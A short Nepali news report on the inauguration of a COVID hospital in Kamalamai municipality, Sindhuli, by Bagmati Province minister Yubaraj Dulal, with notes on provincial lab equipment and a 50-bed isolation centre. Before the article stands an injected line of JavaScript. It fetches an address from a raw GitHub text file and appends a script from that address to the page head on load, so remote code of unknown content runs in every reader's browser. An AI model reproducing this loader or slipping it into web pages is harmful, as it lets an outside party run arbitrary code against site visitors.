;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
मंसिर ०७,
रामेछाप । सिन्धुली जिल्लाको कमलामाई नगरपालिका-६ शिवनगरमा कोभिड अस्पताल उद्धघाटन गरिएको छ ।
आइतबार बागमती प्रदेशका सामाजिक बिकास मन्त्री युबराज दुलालले कोभिड अस्पतालको उद्धाघटन गरेका हुन् ।
साथै उनले निर्माणाको अन्तिम चरणमा रहेको सिन्धुली अस्पताल (कोभिड १९ युनिट) तथा अस्पतालको निर्माण भईरहेको भवनहरुको अनुगमन/निरिक्षण गरेका छन् ।
उद्धघाटन कार्यक्रममा बोल्दै उनले प्रदेशका सबै जिल्लामा कोभिड अस्पताल संचालनमा ल्याईने बताए । कोरोनाबाट बाँच्न सबैले भुमिका खेल्नु पर्ने बताए । मन्त्री दुलालले स्वास्थ्य सेवालाइ जनताकाे पहुँचसम्म पुर्याउन प्रदेश सरकारले आफ्नाे क्षमताले भ्याएसम्म काम गरिरहेकाे बताए ।
त्यस्तै आइतबारै प्रयाेगशाला स्थापनाका लागि प्रदेश सरकारले एक कराेड ३५ लाख बराबरकाे मेशिनरी उपकरणहरु उपलब्ध गराएकाे छ । सिन्धुलीमा निर्माण गरिएकाे ५० वेडकाे आइसाेलेसन सेन्टरलाइ काेभिड अस्पतालकाे रुपमा विकास गरिएकाे छ ।
फेसबुक प्रतिक्रियाहरु